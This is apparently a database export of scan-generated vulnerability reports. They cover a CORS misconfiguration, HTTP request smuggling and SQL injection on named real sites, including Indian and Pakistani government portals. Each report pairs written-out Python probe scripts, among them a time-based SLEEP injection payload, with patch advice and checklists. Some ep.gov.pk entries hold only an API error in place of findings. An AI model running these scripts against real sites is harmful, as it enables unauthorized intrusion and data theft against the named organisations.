CORS).\n\n## Impact\n9. Successful exploitation leads to unauthorized access to protected resources, potential theft of sensitive data, and bypassing of authentication mechanisms via cross-site requests.",
"exploit_code": "import requests\n\n# Target vulnerable endpoint\nurl = \"https://pro.anveshaktool.in/\"\n\n# Arbitrary malicious origin\nmalicious_origin = \"https://gruyzlpzipwv.com\"\n\nheaders = {\n \"Origin\": malicious_origin,\n \"User-Agent\": \"Mozilla/5.0\"\n}\n\nresponse = requests.get(url, headers=headers)\n\n# Check if the Origin was accepted\nif response.headers.get(\"Access-Control-Allow-Origin\") == malicious_origin:\n print(\"[+] CORS Misconfigured: Arbitrary origin trusted\")\n if response.headers.get(\"Access-Control-Allow-Credentials\") == \"true\":\n print(\"[+] Access-Control-Allow-Credentials is True. Sensitive data can be stolen.\")\n print(f\"Response Headers:\\n{response.headers}\")\nelse:\n print(\"[-] Not vulnerable\")",
"patch_code": "## Root Cause\nThe server trusts any origin by reflecting the client-supplied `Origin` header in the `Access-Control-Allow-Origin` response header. This disables the same-origin policy and exposes the application to cross-origin attacks when combined with `Access-Control-Allow-Credentials: true`.\n\n## Before Fix\n```http\nAccess-Control-Allow-Origin: https://gruyzlpzipwv.com\nAccess-Control-Allow-Credentials: true\n```\n\n## After Fix\nOnly allow known, trusted domains explicitly:\n```python\nallowed_origins = ['https://trusted.example.com', 'https://app.trusteddomain.org']\norigin = request.headers.get('Origin')\n\nif origin in allowed_origins:\n response.headers['Access-Control-Allow-Origin'] = origin\n response.headers['Access-Control-Allow-Credentials'] = 'true'\n```\n\n## Defense-in-Depth Checklist\n- [ ] Maintain a strict whitelist of allowed origins.\n- [ ] Never reflect the `Origin` header directly without validation.\n- [ ] Avoid using wildcards like `*` in `Access-Control-Allow-Origin` when credentials are involved.\n- [ ] Log and monitor unexpected origins for detection of abuse attempts.\n- [ ] Periodically audit CORS policies during security reviews.\n\n## Verification Steps\n1. Send a request with a known untrusted origin (e.g., `https://evil.com`).\n2. Confirm that `Access-Control-Allow-Origin` is not set or is absent from the response.\n3. Repeat with a whitelisted origin and verify correct behavior.",
"context": "Severity: High (Certain)\nURL: https://pro.anveshaktool.in/\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/about\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/api\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/api/agencies/active\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/FaceCapture.KxMYEICl.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/ForgotPassword.DSEDHxBM.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/Index.BkxNFKe_.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/Login.39QaS_uP.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/Signup.CMHXCJWR.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/alert-dialog.DAemOyMw.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/card.W5-5lXb_.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-icons.DFKk2K-V.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-maps.CgbOPjNH.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-pdf.CsNv1Okx.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-socketio.XvGWOZWK.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-time.zp-6qPUz.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/index.DC99iDk-.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/label.DHuWt8iL.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/vendor-react.Che5oQJX.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/assets/vendor.B6Uj8dBk.js\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/cdn-cgi/rum\n\n---\n\nSeverity: High (Certain)\nURL: 
https://pro.anveshaktool.in/contact\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/docs\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/faq\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/favicon.ico\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/forgot-password\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/login\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/openapi.json\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/privacy\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/signup\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/status\n\n---\n\nSeverity: High (Certain)\nURL: https://pro.anveshaktool.in/terms\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/assets/chunk-maps.Dgihpmma.css\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/assets/index.BpD8wi1l.css\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/assets/vendor-react.Be32Wa2T.css\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/cdn-cgi/challenge-platform/scripts/jsd/main.js\n\n---\n\nSeverity: Information (Certain)\nURL: https://pro.anveshaktool.in/favicon.svg"
}
]
|
|
69fae73238ce188953537418
|
2026-05-06T07:01:06.261337+00:00
|
[
{
"vulnerability": "HTTP request smuggling",
"category": "miscellaneous",
"exploit_steps": "## HTTP Request Smuggling Exploitation Walkthrough\\n\\n### 1. Reconnaissance\\n- Identified endpoint: `https://mpsedc.mp.gov.in/SimhasthaTechHackathon.html`\\n- Observed that the server accepts both `Content-Length` and `Transfer-Encoding: chunked` headers in the same request, indicating potential inconsistency in HTTP parsing between frontend and backend proxies.\\n\\n### 2. Vulnerability Confirmation\\n- Sent a malformed POST request containing both `Content-Length` and `Transfer-Encoding: chunked` headers.\\n- The presence of these conflicting headers without proper normalization by the frontend indicates a possible desynchronization vulnerability.\\n\\n### 3. Exploitation Steps\\n1. **Craft Malformed Request**: Construct an HTTP request with both `Content-Length` and `Transfer-Encoding: chunked` headers.\\n2. **Send Ambiguous Payload**: Transmit the crafted request to observe inconsistent interpretation by chained servers.\\n3. **Analyze Response Behavior**: Monitor responses for signs of request smuggling such as delayed processing or unexpected content inclusion.\\n\\n### 4. Impact\\n- Potential for bypassing security controls, session fixation, or cache poisoning depending on how downstream components handle the ambiguous request.",
"exploit_code": "import requests\n\n# Target URL from scan data\nurl = \"https://mpsedc.mp.gov.in/SimhasthaTechHackathon.html\"\n\n# Malformed request body simulating smuggling attempt\nmalformed_body = (\"POST /SimhasthaTechHackathon.html?Jb1v=773187510 HTTP/1.1\\r\\n\"\n \"Host: mpsedc.mp.gov.in\\r\\n\"\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n \"Transfer-Encoding: chunked\\r\\n\"\n \"Content-Length: 25\\r\\n\\r\\n\"\n \"f\\r\\n\"\n \"oblez=x&miwvw=x\\r\\n\"\n \"0\\r\\n\\r\\n\")\n\ntry:\n # Sending raw bytes via socket would be ideal, but using requests here shows behavior\n response = requests.post(url, data=\"oblez=x&miwvw=x\", headers={\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Transfer-Encoding': 'chunked',\n 'Content-Length': '25'\n }, timeout=10)\n print(f\"Status Code: {response.status_code}\")\n print(f\"Response Body Length: {len(response.content)}\")\nexcept Exception as e:\n print(f\"Request failed: {str(e)}\")",
"patch_code": "## Root Cause\\nThe vulnerability arises due to inconsistent handling of HTTP requests between frontend and backend servers when both `Content-Length` and `Transfer-Encoding: chunked` headers are present. This allows attackers to smuggle requests through proxy layers.\\n\\n## Before/After Fix\\n**Before:**\\nFrontend allowed ambiguous HTTP headers leading to inconsistent parsing.\\n```http\\nPOST /path HTTP/1.1\\nTransfer-Encoding: chunked\\nContent-Length: 25\\n\\n[body]\\n```\\n\\n**After:**\\nConfigure frontend server to normalize ambiguous requests before forwarding:\\n- Use only one method (`Content-Length` OR `Transfer-Encoding`) per request.\\n- Reject or sanitize conflicting header combinations at ingress.\\n\\nExample Nginx config:\\n```nginx\\nserver {\\n listen 80;\\n location / {\\n proxy_pass http://backend;\\n proxy_set_header Connection '';\\n proxy_http_version 1.1;\\n proxy_hide_header Transfer-Encoding;\\n }\\n}\\n```\\n\\nNote: `proxy_hide_header` only suppresses headers in the upstream *response* on its way back to the client; it does not remove `Transfer-Encoding` from the incoming request, so this snippet alone does not resolve the framing ambiguity. The effective control is the proxy's own request parsing rejecting any request that carries both headers (RFC 9112 §6.1 permits rejecting such a request outright), which the verification steps below should confirm.\\n\\n## Defense-in-Depth Checklist\\n- [ ] Ensure consistent HTTP parser configurations across all proxies and backends\\n- [ ] Disable reuse of backend connections where feasible\\n- [ ] Enforce strict HTTP compliance at network boundaries\\n- [ ] Implement WAF rules to detect conflicting headers\\n- [ ] Regularly audit traffic logs for abnormal patterns\\n\\n## Verification Steps\\n1. Send test requests with conflicting `Content-Length` and `Transfer-Encoding` headers\\n2. Confirm that server either normalizes or rejects such requests\\n3. Validate that no unintended request concatenation occurs\\n4. Review access logs for dropped or sanitized malicious patterns",
"context": "Severity: Medium (Tentative)\nURL: https://mpsedc.mp.gov.in/SimhasthaTechHackathon.html\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://mpsedc.mp.gov.in/robots.txt"
}
]
|
|
6a12865432de6bb6782baab3
|
2026-05-24T05:02:12.394911+00:00
|
[
{
"vulnerability": "SQL injection",
"category": "injection",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://uppolice.gov.in/frmTendermanagement.aspx`\n2. Observed the presence of the `cd` parameter in the URL query string.\n3. Noted that the value of `cd` is base64-encoded (`MQAwADAAMQA%3d` decodes to `1001`).\n\n## Vulnerability Confirmation\n1. Injected a single quote `'` into the `cd` parameter by modifying the URL to `/frmTendermanagement.aspx?ghazipur&cd='`\n2. Observed that the application returned a generic database error message.\n3. Injected two single quotes `''` into the `cd` parameter.\n4. Confirmed that the error disappeared, indicating that the input is directly embedded into an SQL query without proper sanitization.\n\n## Exploitation Steps\n1. Craft a malicious payload designed to manipulate the SQL query structure.\n2. Use time-based SQL injection to infer database information, since error messages may not disclose details.\n3. Submit the payload via a GET request to the vulnerable endpoint.\n4. Monitor response timing to confirm successful exploitation.\n\n## Impact\nSuccessful exploitation allows an attacker to:\n- Extract sensitive data from the database.\n- Potentially escalate privileges and take control of the database server.\n- Bypass authentication or manipulate application logic.",
"exploit_code": "import requests\nimport time\n\n# Target configuration\nurl = \"https://uppolice.gov.in/frmTendermanagement.aspx\"\nparam_name = \"cd\"\nbase_value = \"MQAwADAAMQA=\" # Base64 encoded '1001'\n\n# Time-based SQL injection payload (example for MySQL)\npayload = \"'; SELECT SLEEP(5); --+\"\nencoded_payload = requests.utils.quote(payload)\nfull_url = f\"{url}?ghazipur&{param_name}={encoded_payload}\"\n\nprint(f\"Sending request to: {full_url}\")\nstart_time = time.time()\nresponse = requests.get(full_url, verify=False)\nend_time = time.time()\n\nelapsed_time = end_time - start_time\nprint(f\"Response received in {elapsed_time:.2f} seconds\")\n\nif elapsed_time >= 5:\n print(\"[+] Possible SQL Injection detected via time delay.\")\nelse:\n print(\"[-] No significant delay observed.\")",
"patch_code": "## Root Cause\nThe application incorporates user-supplied data from the `cd` parameter directly into an SQL query without proper sanitization or parameterization. This allows attackers to alter the query's logic by injecting malicious SQL syntax.\n\n## Before/After Code Fix\n**Before (Vulnerable):**\n```csharp\nstring query = \"SELECT * FROM tenders WHERE id = \" + Request.QueryString[\"cd\"];\nSqlCommand cmd = new SqlCommand(query, connection);\n```\n\n**After (Secure - Using Parameterized Query):**\n```csharp\nstring query = \"SELECT * FROM tenders WHERE id = @cd\";\nSqlCommand cmd = new SqlCommand(query, connection);\ncmd.Parameters.AddWithValue(\"@cd\", Request.QueryString[\"cd\"]);\n```\n\nBecause the finding notes that `cd` arrives base64-encoded (decoding to `1001`), decode it first, parse the result with `int.TryParse` and reject anything that is not an integer before binding; prefer an explicitly typed parameter (`cmd.Parameters.Add(\"@cd\", SqlDbType.Int).Value = id;`) over `AddWithValue`, which infers the SQL type from the .NET value.\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict input validation on all parameters.\n- [ ] Apply Web Application Firewall (WAF) rules to detect SQL injection attempts.\n- [ ] Regularly audit database permissions and reduce privileges where possible.\n- [ ] Implement secure coding practices training for developers.\n- [ ] Conduct periodic penetration testing and code reviews.\n\n## Verification Steps\n1. Resend the original test payloads (`'` and `''`) to the `cd` parameter.\n2. Confirm that no database errors are returned.\n3. Validate that application functionality remains intact after applying fixes.\n4. Perform regression tests to ensure no unintended side effects.",
"context": "Severity: High (Tentative)"
}
]
|
|
6a1586b5ae36b72c92a08d4d
|
2026-05-26T11:40:37.522652+00:00
|
[
{
"vulnerability": "SQL injection",
"category": "injection",
"exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.",
"exploit_code": "",
"patch_code": "",
"context": "Severity: High (Firm)\nURL: https://ep.gov.pk/tariff/emsp_tariff.aspx [Type parameter]\n\n---\n\nSeverity: High (Firm)\nURL: https://ep.gov.pk/tariff/emsp_tariff.aspx [Zone parameter]"
},
{
"vulnerability": "File path traversal",
"category": "path_traversal",
"exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.",
"exploit_code": "",
"patch_code": "",
"context": "Severity: High (Firm)"
},
{
"vulnerability": "File path manipulation",
"category": "miscellaneous",
"exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.",
"exploit_code": "",
"patch_code": "",
"context": "Severity: High (Certain)"
},
{
"vulnerability": "Cross-site scripting (reflected)",
"category": "xss",
"exploit_steps": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.",
"exploit_code": "",
"patch_code": "",
"context": "Severity: High (Firm)\nURL: https://ep.gov.pk/tariff/emsp_tariff.aspx [Country_Name parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://ep.gov.pk/track.asp [textfieldz parameter]"
}
]
|
| Documents | 10 |
| Total doc size | 106.2 KB |
| Average doc size | 10.62 KB |
| Pre-allocated size | 152 KB |
| Indexes | 1 |
| Total index size | 36 KB |